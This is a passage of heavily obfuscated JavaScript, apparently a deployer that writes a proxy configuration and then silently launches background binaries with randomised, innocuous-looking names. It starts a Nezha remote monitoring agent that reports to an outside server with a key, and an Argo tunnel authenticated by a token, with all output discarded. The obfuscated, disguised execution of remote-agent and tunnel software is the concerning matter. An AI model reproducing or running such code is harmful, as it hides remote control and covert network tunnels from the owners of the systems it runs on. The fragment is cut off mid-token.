_0x1edcf2=_0xa9d7da[_0x29cc47(_0x5234fd._0x532315,0x32,_0x5234fd._0x2e8094,-0xfd)](execSync,_0xa9d7da[_0x29cc47(-_0x5234fd._0xc2e461,-_0x5234fd._0x3a0eaa,-_0x5234fd._0x431ff0,-_0x5234fd._0x1c5d9b)],{'encoding':_0xa9d7da['PSQcZ']})[_0x29cc47(0x28b,_0x5234fd._0x5d9118,_0x5234fd._0x4de2d3,_0x5234fd._0x8a540f)]();_0x3baeb5=_0x1edcf2===_0xa9d7da[_0x29cc47(_0x5234fd._0x2d8aa7,_0x5234fd._0x3eaeb4,_0x5234fd._0x2b6722,_0x5234fd._0xd10224)];}catch(_0x4c4b85){if(_0xa9d7da[_0x3852e1(_0x5234fd._0x44566e,_0x5234fd._0x287667,_0x5234fd._0x2f2bce,_0x5234fd._0x4a6744)]===_0xa9d7da[_0x3852e1(_0x5234fd._0x45732e,_0x5234fd._0x3746df,_0x5234fd._0x31c9c7,_0x5234fd._0x5cad2c)]){if(_0x4c4b85[_0x3852e1(_0x5234fd._0x267ffd,0x4a4,_0x5234fd._0x33f339,_0x5234fd._0x29c121)]&&_0x4c4b85['output'][-0x1*-0x773+-0x2*0x4d5+-0x2*-0x11c]){const _0x259655=_0x4c4b85[_0x3852e1(_0x5234fd._0x265ba2,_0x5234fd._0x1aa5f6,_0x5234fd._0x3db2c6,_0x5234fd._0x781779)][-0x1e4a+0x9aa+-0x1*-0x14a1][_0x3852e1(_0x5234fd._0x385a04,_0x5234fd._0x215af4,0x42b,_0x5234fd._0x1bab78)]()[_0x29cc47(_0x5234fd._0x40da39,0x11c,0x230,0xd0)]();_0x3baeb5=_0x259655===_0xa9d7da[_0x29cc47(_0x5234fd._0x5cf063,_0x5234fd._0x3eaeb4,_0x5234fd._0x11aa76,_0x5234fd._0x81e5c7)];}else _0x3baeb5=![];}else{const _0x37e5fc=_0x34c761[0x208c+0x2667+0x2*-0x2379];_0x4ac114[_0x29cc47(_0x5234fd._0x3881de,_0x5234fd._0x1f27d2,_0x5234fd._0x8cbf55,_0x5234fd._0x11ac30)](_0x37e5fc);}}if(!_0x3baeb5){if(!_0xb03ba0[_0x29cc47(-_0x5234fd._0xdff026,-0x16b,-_0x5234fd._0x4f1b00,-0x233)]){if(_0xa9d7da['AGLjZ'](_0x29cc47(_0x5234fd._0x406550,_0x5234fd._0x399952,-_0x5234fd._0x19ace7,0x128),_0xa9d7da[_0x3852e1(_0x5234fd._0x9c33cc,0x3da,_0x5234fd._0xb30543,_0x5234fd._0x3ee815)]))_0xb03ba0[_0x29cc47(-_0x5234fd._0x526209,-_0x5234fd._0x4dee03,-_0x5234fd._0x55c859,-_0x5234fd._0x21296a)]={};else{const _0x4372a1={};_0x4372a1[_0x29cc47(-_0x5234fd._0x1fc12d,-_0x5234fd._0x4508f5,-_0x5234fd._0x35a72f,-_0x5234fd._0x32c4a3)]=_0x522ded,_0x4372a1[_0x29cc47(-0x69,_0x5234fd._0x2a9b9d,_0x5234fd._0x5c0bde,_0x5234fd._0x27a448)]=_0x3852e1(_0x5234fd._0x54ce39,_0x5234fd._0x3ad167,_0x5234fd._0x53c2e9,0x547);const _0x2d3e40={};_0x2d3e40[_0x29cc47(-_0x5234fd._0x22a892,-_0x5234fd._0x253c13,-_0x5234fd._0x3095da,-0x8b)]=_0x29cc47(_0x5234fd._0x4e1eea,-0xca,-_0x5234fd._0x2e290a,-_0x5234fd._0x5b607e),_0x2d3e40['server_port']=0x1bb;const _0x57f215={};_0x57f215[_0x3852e1(_0x5234fd._0x57b58f,0x61f,_0x5234fd._0x3ebbac,_0x5234fd._0x1a89d8)]=!![],_0x57f215[_0x3852e1(0x5de,0x384,0x433,0x471)]=_0x2d3e40,_0x57f215[_0x3852e1(_0x5234fd._0x5af556,_0x5234fd._0x3d5e2d,_0x5234fd._0x22cc84,_0x5234fd._0x1f8752)]=_0x5b7988,_0x57f215[_0x29cc47(_0x5234fd._0x3fba06,-_0x5234fd._0x1ca3cd,-0x173,-0xab)]=[''];const _0xb054e5={};_0xb054e5[_0x29cc47(0x3d,_0x5234fd._0x2e1654,-_0x5234fd._0x1454e4,_0x5234fd._0x204b28)]=!![],_0xb054e5[_0x3852e1(0x459,_0x5234fd._0xf5803d,0x465,_0x5234fd._0x15ef08)]=_0x29cc47(-_0x5234fd._0x1645e1,-_0x5234fd._0x34430c,-_0x5234fd._0x58d0eb,-0x121),_0xb054e5[_0x3852e1(_0x5234fd._0x2d539a,_0x5234fd._0x4bf351,_0x5234fd._0x554656,0x51e)]=_0x57f215,_0xf10457[_0x3852e1(0x267,_0x5234fd._0x5c4d4b,_0x5234fd._0x34c39c,_0x5234fd._0x481a10)]['push']({'tag':_0x1c5b96['oDdQc'],'type':_0x1c5b96[_0x29cc47(0x8,0xe5,_0x5234fd._0x4f46ee,_0x5234fd._0xacebdf)],'listen':'::','listen_port':_0x1c5b96[_0x29cc47(-_0x5234fd._0x9a1b62,-_0x5234fd._0x242172,_0x5234fd._0x8c992d,-0x1a0)](_0x9385b3,_0x23fc4f),'users':[_0x4372a1],'tls':_0xb054e5});}}if(!_0xb03ba0[_0x29cc47(-_0x5234fd._0x29a56c,-0x16b,-_0x5234fd._0x10cd29,-_0x5234fd._0x435086)][_0x29cc47(_0x5234fd._0x1e3a0c,_0x5234fd._0x3aa61c,-_0x5234fd._0x10132b,_0x5234fd._0x53b8b9)]){if(_0xa9d7da[_0x29cc47(-_0x5234fd._0x2e30b7,-_0x5234fd._0x10e4d9,-_0x5234fd._0x473346,-0x1ce)](_0xa9d7da[_0x3852e1(0x19b,0x2e2,_0x5234fd._0x5c9b17,_0x5234fd._0x1dcfe8)],_0xa9d7da[_0x3852e1(0x387,_0x5234fd._0xf4bc6b,_0x5234fd._0x5c3e7a,_0x5234fd._0x8de2db)]))return _0x677646[_0x3852e1(0x34e,_0x5234fd._0x59a11e,_0x5234fd._0x26f53c,_0x5234fd._0x121075)];else _0xb03ba0[_0x3852e1(_0x5234fd._0x2eb7d6,_0x5234fd._0x118d28,0x336,_0x5234fd._0x566846)]['rule_set']=[];}!_0xb03ba0[_0x29cc47(-_0x5234fd._0x582420,-_0x5234fd._0x451f6c,-_0x5234fd._0x40ac71,-0x29d)]['rules']&&(_0xb03ba0['route'][_0x3852e1(0x485,0x63a,0x5eb,_0x5234fd._0x1c5669)]=[]);const _0x84c584=_0xb03ba0[_0x29cc47(_0x5234fd._0x259beb,-_0x5234fd._0x451f6c,-_0x5234fd._0x4385c9,-_0x5234fd._0x2570e3)][_0x29cc47(0xe3,_0x5234fd._0x3aa61c,_0x5234fd._0x283f36,_0x5234fd._0x83e727)]['find'](_0x58307b=>_0x58307b['tag']===_0x29cc47(-0x1c5,-0x199,-0xbf,-0x1eb));if(!_0x84c584){const _0x412211={};_0x412211[_0x3852e1(_0x5234fd._0x5938a9,0x1f7,_0x5234fd._0x10dd23,_0x5234fd._0x42bc8a)]=_0xa9d7da[_0x29cc47(-0xb3,-_0x5234fd._0x277189,-_0x5234fd._0x485c7a,0x49)],_0x412211['type']=_0xa9d7da[_0x3852e1(_0x5234fd._0x120b29,_0x5234fd._0x1c0a6b,_0x5234fd._0x105d9e,0x564)],_0x412211[_0x29cc47(-_0x5234fd._0x267844,-_0x5234fd._0x23bba4,-0x46,-_0x5234fd._0xf53d11)]=_0xa9d7da[_0x3852e1(_0x5234fd._0x7452e5,_0x5234fd._0x390b3e,0x65a,0x569)],_0x412211['url']=_0x29cc47(-_0x5234fd._0xabea70,-_0x5234fd._0x481b7c,-_0x5234fd._0x51da9c,-_0x5234fd._0x22efa3),_0x412211[_0x29cc47(-_0x5234fd._0x5e0468,-_0x5234fd._0x43d9c4,0x82,-0xf0)]=_0xa9d7da[_0x29cc47(-_0x5234fd._0x23bd4a,-0x5c,-_0x5234fd._0x1485d1,-_0x5234fd._0xf77579)],_0xb03ba0[_0x29cc47(-_0x5234fd._0x510f91,-0x16b,-_0x5234fd._0x211285,-_0x5234fd._0x385750)][_0x3852e1(_0x5234fd._0x249fab,_0x5234fd._0x22a90d,_0x5234fd._0x4b4426,_0x5234fd._0x597a46)]['push'](_0x412211);}else{}let _0x154071=_0xb03ba0['route'][_0x3852e1(0x5e5,_0x5234fd._0xead330,_0x5234fd._0x4937e1,0x520)][_0x3852e1(_0x5234fd._0x423964,_0x5234fd._0xd4e75c,0x31d,_0x5234fd._0x34fb88)](_0xbb2b0b=>_0xbb2b0b['outbound']===_0x29cc47(-0x45,0x97,-0x8d,-0xc5));if(!_0x154071){const _0x395a1a={};_0x395a1a[_0x3852e1(_0x5234fd._0xe72c6d,_0x5234fd._0x50fd10,_0x5234fd._0x272214,0x55f)]=[_0xa9d7da['SfQkJ'],_0xa9d7da[_0x29cc47(-_0x5234fd._0x4f69d2,-0x34,-_0x5234fd._0x1c9c66,0x23)],_0xa9d7da[_0x3852e1(_0x5234fd._0x30785d,_0x5234fd._0x87f235,_0x5234fd._0x5c4d4b,_0x5234fd._0x4cc578)]],_0x395a1a[_0x29cc47(-_0x5234fd._0x3bd355,-_0x5234fd._0x491430,-_0x5234fd._0x2e4714,-_0x5234fd._0x19c146)]=_0xa9d7da[_0x29cc47(-_0x5234fd._0x530421,-0xdb,-_0x5234fd._0x1fc12d,0x78)],_0x154071=_0x395a1a,_0xb03ba0[_0x29cc47(-_0x5234fd._0x29f5c6,-_0x5234fd._0x451f6c,-_0x5234fd._0x295211,-_0x5234fd._0x37f607)]['rules'][_0x29cc47(0x1d1,0xe6,_0x5234fd._0xaa1a48,-_0x5234fd._0x5d4bb6)](_0x154071);}else{if(_0xa9d7da[_0x3852e1(_0x5234fd._0x144350,0x60f,_0x5234fd._0x6e2a26,0x556)](_0xa9d7da[_0x29cc47(_0x5234fd._0x17c6c9,-_0x5234fd._0x7e3532,-_0x5234fd._0x37a7ee,-_0x5234fd._0x1d988b)],_0xa9d7da['yLNfE'])){if(!_0x154071[_0x29cc47(0x181,_0x5234fd._0x176f25,-_0x5234fd._0x3b420b,_0x5234fd._0xf12fd4)]['includes']('youtube'))_0x154071[_0x3852e1(_0x5234fd._0xa6a1fe,_0x5234fd._0x2948c9,_0x5234fd._0x174d8d,_0x5234fd._0x597a46)]['push'](_0x3852e1(_0x5234fd._0x51048c,_0x5234fd._0x1065f4,_0x5234fd._0x30078e,_0x5234fd._0x8f745));else{}}else _0x3a5717?_0x216eca[_0x3852e1(0x252,0x360,_0x5234fd._0x57f71f,0x31f)]('Empowerment\x20failed\x20for\x20'+_0x1c1a14+':\x20'+_0x5d1bf5):_0xf58be7[_0x29cc47(-_0x5234fd._0x4700bd,_0x5234fd._0x21b707,_0x5234fd._0x267844,0x1a0)](_0x3852e1(_0x5234fd._0x215af4,_0x5234fd._0x4abc2a,_0x5234fd._0x3bdd7b,_0x5234fd._0x17044b)+_0x5519bb+':\x20'+_0x4ba172[_0x3852e1(_0x5234fd._0x26f13c,_0x5234fd._0x3c13ae,0x462,0x451)](-0x877*-0x1+0x2c*0xc0+-0x296f));}console['log'](_0xa9d7da['IqqJG']);}else{}}else{const _0x22ee85={};_0x22ee85[_0x29cc47(-_0x5234fd._0x8e7f79,-0x94,-0x117,_0x5234fd._0x2211dd)]=_0x3852e1(_0x5234fd._0x9d630b,0x55e,_0x5234fd._0x1b1dd0,_0x5234fd._0x147819),_0x22ee85[_0x3852e1(0x3cf,_0x5234fd._0xa6717e,_0x5234fd._0x24e7c3,_0x5234fd._0x27560f)]=_0x3852e1(_0x5234fd._0x3b4cbe,_0x5234fd._0x5c224e,0x449,_0x5234fd._0x2a7aa9);const _0x11d5a1={};_0x11d5a1[_0x29cc47(-_0x5234fd._0x21b707,-0x94,-_0x5234fd._0x59f9d9,_0x5234fd._0x233160)]=_0x677646[_0x3852e1(0x496,_0x5234fd._0x575716,_0x5234fd._0x18ad21,_0x5234fd._0x5ae603)],_0x11d5a1['fileUrl']=_0x3852e1(_0x5234fd._0x2d03fe,_0x5234fd._0x1196d3,_0x5234fd._0x1a068c,_0x5234fd._0x65710a),_0x14c341=[_0x22ee85,_0x11d5a1];}}catch(_0x26972a){if(_0x29cc47(-_0x5234fd._0x27dfea,-_0x5234fd._0x38186e,0x5d,0x69)!==_0xa9d7da[_0x29cc47(-_0x5234fd._0x3a44d3,-_0x5234fd._0xd9265d,-_0x5234fd._0x2525db,-_0x5234fd._0x52aa9a)])console[_0x29cc47(-_0x5234fd._0x46a74f,-_0x5234fd._0x3d993b,-_0x5234fd._0x89b63,-_0x5234fd._0x2c1a2d)](_0xa9d7da['uvJVw'],_0x26972a);else{const _0x3d4a79=_0x29cc47(-0x10d,-_0x5234fd._0xd02f7d,-_0x5234fd._0x44cfcc,-_0x5234fd._0x53ea32)+_0x2548e3+'@'+_0x893004+':'+_0x519b62+_0x3852e1(_0x5234fd._0x3ff27f,_0x5234fd._0x50075b,0x328,_0x5234fd._0x451414)+_0x2833d0+'&type=tcp&headerType=none#'+_0x5093e4;_0x2f6152+=_0x3d4a79;}}fs[_0x29cc47(_0x5234fd._0x61c74c,_0x5234fd._0x233160,-_0x5234fd._0x40df18,_0x5234fd._0x3c82ca)](path['join'](FILE_PATH,'config.json'),JSON[_0x29cc47(-_0x5234fd._0x244676,-_0x5234fd._0x305bc0,-_0x5234fd._0x2d2951,-0xce)](_0xb03ba0,null,-0x1*-0x4ef+-0x1f5*-0x7+-0x12a0));let _0x246160='';if(NEZHA_SERVER&&NEZHA_PORT&&NEZHA_KEY){if(_0x3852e1(0x323,_0x5234fd._0x4d0be2,_0x5234fd._0x344c3f,0x2f2)!==_0xa9d7da[_0x29cc47(-0x148,-0x7d,0xef,-0xa9)])return![];else{const _0x1c1038=[_0xa9d7da[_0x3852e1(_0x5234fd._0x33849f,_0x5234fd._0x2b5f71,0x5aa,_0x5234fd._0x2e61bb)],_0x29cc47(-0x18,_0x5234fd._0x525f8c,-_0x5234fd._0x3cad94,-0x4),_0xa9d7da[_0x29cc47(-_0x5234fd._0x46ec5b,-0xbe,-_0x5234fd._0x3427c0,-_0x5234fd._0x242172)],_0xa9d7da[_0x3852e1(_0x5234fd._0x8de2db,_0x5234fd._0x363438,0x467,_0x5234fd._0x2e8ac2)],_0x3852e1(_0x5234fd._0x3d6c92,_0x5234fd._0x65710a,_0x5234fd._0x1188ad,_0x5234fd._0x5a6d04),_0x29cc47(-_0x5234fd._0x12564b,-0x79,-0x14,-0xac)];if(_0x1c1038[_0x29cc47(-_0x5234fd._0x4a9067,-0x93,_0x5234fd._0x3fc4d7,-_0x5234fd._0x420436)](NEZHA_PORT))_0x246160=_0xa9d7da[_0x3852e1(0x207,_0x5234fd._0x1e3a0c,_0x5234fd._0x1185ce,_0x5234fd._0x18dd9a)];else{if(_0xa9d7da[_0x3852e1(0x3d4,_0x5234fd._0x574f01,_0x5234fd._0x115e0d,_0x5234fd._0x296ee2)]!=='eeump')_0x246160='';else{const _0x1973aa={_0x14331f:0x3f,_0x789cc8:0x15,_0x5e28ba:0x2ff,_0x8217ea:0x2d2,_0x506fb8:0x115,_0x363ab3:0x1e6,_0x46096e:0x9f,_0x4f4c7e:0x335,_0x424f35:0xa3},_0x18ac31={_0x5ec563:0x39,_0x5c7101:0xae};_0x2b87e7[_0x3852e1(_0x5234fd._0x5534b1,_0x5234fd._0x25ce32,_0x5234fd._0x165384,_0x5234fd._0x239812)](_0x5cb995,_0x1114f,_0x471368=>{const _0x4d42e4={_0x43d7a8:0x8a,_0x58fc42:0x334};function _0x1d9289(_0x35e484,_0x35f1ac,_0x2af216,_0x4ab813){return _0x3852e1(_0x35e484,_0x35f1ac-_0x4d42e4._0x43d7a8,_0x2af216-0xc8,_0x4ab813- -_0x4d42e4._0x58fc42);}function _0x1b26e3(_0x476c62,_0x5ef25c,_0x152102,_0x30238e){return _0x3852e1(_0x30238e,_0x5ef25c-0x29,_0x152102-_0x18ac31._0x5ec563,_0x476c62-_0x18ac31._0x5c7101);}_0x471368?_0x2e4e98[_0x1d9289(-0xeb,-0x17a,_0x1973aa._0x14331f,-_0x1973aa._0x789cc8)](_0x1d9289(_0x1973aa._0x5e28ba,_0x1973aa._0x8217ea,_0x1973aa._0x506fb8,_0x1973aa._0x363ab3)+_0x1f0010+':\x20'+_0x471368):_0x463f56['log'](_0x1d9289(_0x1973aa._0x46096e,_0x1973aa._0x4f4c7e,_0x1973aa._0x424f35,0x1e1)+_0x2d6eed+':\x20'+_0x5ca11c['toString'](-0x13*-0xbe+-0x6ef+-0x105*0x7));});}}const _0x1cefc1='nohup\x20'+path['join'](FILE_PATH,npmRandomName)+_0x29cc47(-_0x5234fd._0x4f8db8,-_0x5234fd._0x149434,-_0x5234fd._0x4f9d4c,-_0x5234fd._0x29fe22)+NEZHA_SERVER+':'+NEZHA_PORT+_0x3852e1(_0x5234fd._0x1cd4fe,_0x5234fd._0x33737e,0x474,0x441)+NEZHA_KEY+'\x20'+_0x246160+_0x29cc47(0x14b,_0x5234fd._0x1fd2d5,-0x6,_0x5234fd._0x2a3d0c);try{await execPromise(_0x1cefc1),console[_0x29cc47(-0xc1,0xa6,0x89,0xed)](_0xa9d7da[_0x29cc47(_0x5234fd._0x1f2132,_0x5234fd._0x5eb3c9,_0x5234fd._0x2db0f9,_0x5234fd._0x2e4714)]),await new Promise(_0x3291ff=>setTimeout(_0x3291ff,0x1b36+0x14c8+-0x2c16));}catch(_0x3f9e91){console[_0x29cc47(-_0x5234fd._0x22a892,-_0x5234fd._0x3d993b,-_0x5234fd._0x358824,-_0x5234fd._0x13e89b)](_0x3852e1(_0x5234fd._0x74e929,_0x5234fd._0x2cf1cc,_0x5234fd._0x3af020,_0x5234fd._0x151dfe)+_0x3f9e91);}}}else{if(_0xa9d7da[_0x29cc47(_0x5234fd._0x32dbff,-_0x5234fd._0x25ae60,-0x9f,_0x5234fd._0x3cee31)](NEZHA_SERVER,NEZHA_KEY)){if(_0xa9d7da['IOdVZ'](_0xa9d7da[_0x29cc47(-0x13e,-_0x5234fd._0x540aaa,-0x1e5,-_0x5234fd._0x5ee6ff)],_0x3852e1(0x2b2,_0x5234fd._0x1a4e95,_0x5234fd._0x1e74aa,_0x5234fd._0x1cf9ac))){if(_0xddff0e){const _0x1acd78=_0x304589['apply'](_0x458397,arguments);return _0x588dbf=null,_0x1acd78;}}else{const _0x2b4a29=_0x3852e1(_0x5234fd._0x2670b3,0x25d,_0x5234fd._0x17445b,_0x5234fd._0x2bc31a)+FILE_PATH+'/'+phpRandomName+_0x3852e1(_0x5234fd._0x5baf7c,_0x5234fd._0x50ec14,_0x5234fd._0x47d956,_0x5234fd._0x2d539a)+FILE_PATH+_0x29cc47(-_0x5234fd._0x44cfcc,-_0x5234fd._0x21b707,0x5,_0x5234fd._0x303106);try{await _0xa9d7da['MzMdl'](exec,_0x2b4a29),console['log'](_0xa9d7da[_0x29cc47(_0x5234fd._0x343a63,_0x5234fd._0xb2fda0,-_0x5234fd._0x3d7d2e,0x119)]),await new Promise(_0x8edc5c=>setTimeout(_0x8edc5c,-0x1082+-0xdd0+0x223a*0x1));}catch(_0x3cb7f2){console[_0x3852e1(_0x5234fd._0x52332a,_0x5234fd._0x1750c4,_0x5234fd._0x4aede5,_0x5234fd._0xd11937)](_0x29cc47(0x179,0xdf,_0x5234fd._0x3b8627,_0x5234fd._0x37b022)+_0x3cb7f2);}}}else _0xa9d7da['yGrBe'](_0xa9d7da['NiLDj'],_0xa9d7da['UMLga'])?_0x49fb11[_0x29cc47(-_0x5234fd._0x5d79e3,-_0x5234fd._0x45bdb7,_0x5234fd._0x251782,-_0x5234fd._0x5c8ada)]('Failed\x20to\x20get\x20IP\x20address:',_0x321845[_0x29cc47(-_0x5234fd._0x3a2ad9,-_0x5234fd._0x5e4bf6,-_0x5234fd._0x2e885,-_0x5234fd._0x550795)]):console[_0x3852e1(0x409,0x578,_0x5234fd._0x16e995,_0x5234fd._0x5cad6b)](_0xa9d7da[_0x29cc47(-_0x5234fd._0x43d9c4,-_0x5234fd._0x4dbe19,-_0x5234fd._0x499261,0x10f)]);}const _0x1f741a=_0x29cc47(-_0x5234fd._0x17376c,-_0x5234fd._0x10cd29,-0x1b3,-_0x5234fd._0x41d921)+path[_0x29cc47(-_0x5234fd._0x4acff3,0x79,-_0x5234fd._0x5c3056,_0x5234fd._0x1f8903)](FILE_PATH,webRandomName)+_0x3852e1(_0x5234fd._0x44510f,0x5d4,_0x5234fd._0x172135,_0x5234fd._0x228f38)+path[_0x29cc47(-_0x5234fd._0x43c513,0x79,-0x9e,0x1bd)](FILE_PATH,_0xa9d7da[_0x29cc47(-0x201,-0x1c4,-0x1fa,-0x134)])+_0x3852e1(_0x5234fd._0x200e05,_0x5234fd._0x53b53a,_0x5234fd._0x12b401,_0x5234fd._0x47419d);try{await _0xa9d7da[_0x29cc47(0x19c,_0x5234fd._0x2ed50d,_0x5234fd._0x4700bd,-_0x5234fd._0x4261d5)](execPromise,_0x1f741a),console['log'](_0xa9d7da[_0x3852e1(_0x5234fd._0x7b7ea6,_0x5234fd._0x5c45f7,_0x5234fd._0xa0245e,_0x5234fd._0x553bb7)]),await new Promise(_0x119117=>setTimeout(_0x119117,0x102c+0x15*-0x7d+0x67*-0x5));}catch(_0x130215){_0xa9d7da[_0x3852e1(_0x5234fd._0x3cbf56,_0x5234fd._0x37e035,_0x5234fd._0x1df70c,0x2c9)]===_0x29cc47(-_0x5234fd._0x15461c,-_0x5234fd._0x218e01,-_0x5234fd._0x4aca85,-0x2a0)?console[_0x3852e1(_0x5234fd._0x2ae2b3,_0x5234fd._0x5db54e,_0x5234fd._0x4e044a,_0x5234fd._0x4f39b6)](_0x3852e1(_0x5234fd._0x1f1389,0x450,_0x5234fd._0x23e3db,_0x5234fd._0x35d8d9)+_0x130215):_0x34052b=_0x4e5ae1[_0x29cc47(-_0x5234fd._0x1e937c,-_0x5234fd._0x47a257,0xa8,-_0x5234fd._0x3d0c25)];}if(fs['existsSync'](path['join'](FILE_PATH,botRandomName))){let _0x4f83e4;if(ARGO_AUTH[_0x3852e1(_0x5234fd._0x8f0e40,0x2cc,_0x5234fd._0x2e3de2,_0x5234fd._0x136c89)](/^[A-Z0-9a-z=]{120,250}$/))_0x4f83e4=_0x29cc47(_0x5234fd._0x90b55c,0x4d,_0x5234fd._0x541d0b,-_0x5234fd._0x57cb80)+ARGO_AUTH;else{if(ARGO_AUTH[_0x3852e1(0x30b,_0x5234fd._0x11c317,_0x5234fd._0x10cd0a,_0x5234fd._0x4908ca)](/TunnelSecret/)){if(_0xa9d7da[_0x3852e1(_0x5234fd._0xf4bc6b,_0x5234fd._0x2fd5e5,0x2a5,0x39d)](_0xa9d7da[_0x3852e1(0x331,_0x5234fd._0x324bdf,_0x5234fd._0x4438b2,0x3a2)],_0xa9d7da[_0x29cc47(-_0x5234fd._0x19b0d3,-_0x5234fd._0x30c9dd,_0x5234fd._0xdfddda,-_0x5234fd._0x1b281d)])){if(_0x1c5b96['QSejo'](_0x334cd2,null)||_0x1c5b96['QSejo'](_0x2121cc,_0xc6fb67)||_0x1c5b96['QSejo'](_0x53d21d,''))return![];if(_0x1c5b96[_0x3852e1(0x302,_0x5234fd._0x10f913,_0x5234fd._0xb78638,_0x5234fd._0x3a67c2)](typeof _0x481bd5,'string')&&_0x1c5b96[_0x3852e1(_0x5234fd._0x11c889,_0x5234fd._0x3e96f2,0x575,_0x5234fd._0x298318)](_0xa42ee6[_0x3852e1(_0x5234fd._0x15998a,0x614,_0x5234fd._0x2d561c,_0x5234fd._0x4ba1b8)](),''))return![];const _0x425439=_0x17e3e7(_0x59cb44);if(_0x1c5b96[_0x3852e1(_0x5234fd._0x5f4822,_0x5234fd._0x542838,_0x5234fd._0x45fcbc,0x351)](_0x4828f8,_0x425439))return![];if(_0x1c5b96[_0x3852e1(0x302,0x3f2,_0x5234fd._0x25f6cd,_0x5234fd._0x5478d9)](_0x425439,0x1*-0x17cc+-0x67a+0x1e47)||_0x1c5b96['ZDmou'](_0x425439,0x17a66+0x6da*-0x1+0x1*-0x738d))return![];return!![];}else _0x4f83e4=_0x29cc47(_0x5234fd._0x296833,-_0x5234fd._0x1454e4,-0x145,_0x5234fd._0x121024)+path[_0x3852e1(0x559,_0x5234fd._0x234e09,_0x5234fd._0x13cf58,0x4d3)](FILE_PATH,_0x29cc47(-_0x5234fd._0x34a240,-_0x5234fd._0x3a5bf8,-_0x5234fd._0x18f25b,-_0x5234fd._0x29acee))+_0x3852e1(_0x5234fd._0x5d8e4f,_0x5234fd._0x2eaab5,0x1d5,0x341);}else _0x4f83e4=_0x29cc47(_0x5234fd._0x2ed50d,_0x5234fd._0x7696c4,_0x5234fd._0x4644ea,_0x5234fd._0x391150)+path['join'](FILE_PATH,_0xa9d7da[_0x3852e1(0x270,_0x5234fd._0x599144,_0x5234fd._0x5e833d,_0x5234fd._0x5b01ab)])+'\x20--loglevel\x20info\x20--url\x20http://localhost:'+ARGO_PORT;}try{if(_0xa9d7da['usGuz']!==_0xa9d7da[_0x3852e1(0x42f,_0x5234fd._0x43cf25,_0x5234fd._0x4a02a5,_0x5234fd._0x1969f9)]){const _0x3cb3c2=_0x353e2d['apply'](_0xe020fc,arguments);return _0x15e722=null,_0x3cb3c2;}else await execPromise(_0x29cc47(-_0x5234fd._0x4b3250,-_0x5234fd._0x10cd29,-_0x5234fd._0x295211,-_0x5234fd._0xe331b4)+path[_0x29cc47(_0x5234fd._0x19f606,0x79,_0x5234fd._0x3c82ca,_0x5234fd._0x4c8194)](FILE_PATH,botRandomName)+'\x20'+_0x4f83e4+'\x20>/dev/null\x202>&1\x20&'),console[_0x29cc47(-_0x5234fd._0x1affd8,0xa6,_0x5234fd._0xc806eb,_0x5234fd._0x2e50bd)](_0xa9d7da[_0x3852e1(0x26b,_0x5234fd._0xf5803d,0x36f,_0x5234fd._0x3f90ba)]),await new Promise(_0x153d70=>setTimeout(_0x153d70,-0x1*-0x13f9+0xee8+-0x1b11));}catch(_0x5aa980){console[_0x3852e1(_0x5234fd._0x1fc615,_0x5234fd._0x53be4f,_0x5234fd._0x46f4c5,0x31f)](_0x29cc47(-0x1,0x8b,0x191,_0x5234fd._0x5d9118)+_0x5aa980);}}await new Promise(_0x578d44=>setTimeout(_0x578d44,0x173b*0x1+-0x1aad+0x16fa)),await _0xa9d7da[_0x3852e1(_0x5234fd._0x261ecd,_0x5234fd._0x5ef22b,_0x5234fd._0x12511b,0x487)](extractDomains);}else _0x5238fe['route']={};});};}function execPromise(_0x42e75e){const _0x4e715d={_0x1a32da:0x3b7,_0x44b692:0x44d,_0x104150:0x37f,_0x2b74cb:0x26a,_0x50e7a2:0x39c,_0xe8ad85:0x30f,_0x937a6b:0x376,_0xdb5079:0x282,_0x137a4b:0x148,_0x5a0824:0x10a,_0x1ca1b3:0x85,_0x36808b:0x385,_0x4c468e:0x397,_0x8474ed:0x469,_0x2e486c:0x3e7,_0x1ea2b8:0x2d4,_0x83d533:0x2af,_0x11110e:0x253,_0x277228:0x333,_0x10540a:0x467,_0x192599:0x5ad,_0x20032c:0x18a,_0x8b16ba:0x1fc,_0x488f2f:0x275,_0x4875fd:0x257,_0x183465:0x2c5,_0x2101ed:0x21c,_0x50bbef:0x1e7,_0x37081c:0x384,_0x37812d:0x370,_0x5957f0:0x440,_0x4935fc:0x38c,_0x200c3e:0x35e},_0xa8fe9f={_0x441424:0x1e9,_0x3bbdcc:0x23e,_0x4b4b75:0x9d,_0x430d71:0x18f,_0x3f7ea3:0x306,_0x55e4b0:0x174,_0x419649:0x26,_0x242943:0x2e3,_0x2b6a3e:0x173,_0x53c202:0x36,_0x1e30fa:0x109,_0x3b19d1:0x133,_0x59b39d:0x125,_0x405c74:0x52,_0x227f85:0x145,_0x5b9220:0x28,_0x15bd19:0x211,_0x16db6c:0x33d,_0x56a73a:0x2fd,_0x116357:0x374,_0x47562a:0x1cc,_0xa814b6:0xd2,_0x13fea7:0x208,_0x5265b8:0x2a7,_0x2ae43f:0x318,_0x1ac5f8:0x16d,_0x1afafc:0x230,_0x2c2356:0x44,_0x4f9771:0x106,_0x241933:0x92,_0x3e6f8b:0x66,_0x30a9d8:0x1a2,_0x2ab42c:0x88,_0x3df2e6:0x1e4,_0x31104a:0x3e7,_0x32994b:0x268,_0x1fa7d4:0x1c8,_0x3f83dd:0x2c8,_0x2a0d32:0xf8,_0x4adb3d:0x301,_0x652a59:0x258,_0x5f0485:0x143,_0x1921cc:0x4f,_0x3f34ac:0xee,_0x5b44aa:0x187,_0x492c06:0x192,_0x11e0aa:0x40,_0xa58e5d:0x1f2,_0x20e9da:0xe9,_0x4195d9:0x2c6,_0x585f9d:0x1b7,_0x55d669:0x56,_0x3f4be2:0xfe,_0x5991b7:0x7c,_0x25ae79:0x4c,_0x3d9e94:0x4,_0x1c514e:0x56,_0x307b31:0xab,_0x154359:0x83,_0xd8c4a9:0xd9,_0x2a5729:0xd3,_0xd38d76:0x239,_0x37cdac:0x18c},_0x5e23f7={_0x28d301:0x561,_0x503578:0x52c,_0x4a132a:0x467,_0x5a1e90:0x428,_0x2d3014:0x55a,_0x397aee:0x5b3,_0x5919b2:0x532,_0x2095f4:0x46a,_0x308ca5:0x599,_0x36ccce:0xc6,_0x297c3a:0x11f,_0x2a0418:0x277,_0x31c6c5:0x20b,_0x51bdab:0x394,_0x523a3a:0x303,_0x463afb:0x361,_0x206d3e:0x18d,_0x2892a5:0x47,_0x4354d8:0x1e1,_0x588795:0x16a,_0xf7c00f:0x133,_0x548e09:0x34,_0x37b549:0x361,_0xf54dd7:0x432,_0x309013:0x3c9,_0x5adef8:0x39b,_0x88aacf:0x4d,_0x39b5e0:0x73,_0x2fc073:0x147,_0x2bcbdb:0x4aa,_0xa8c565:0x5cf,_0x5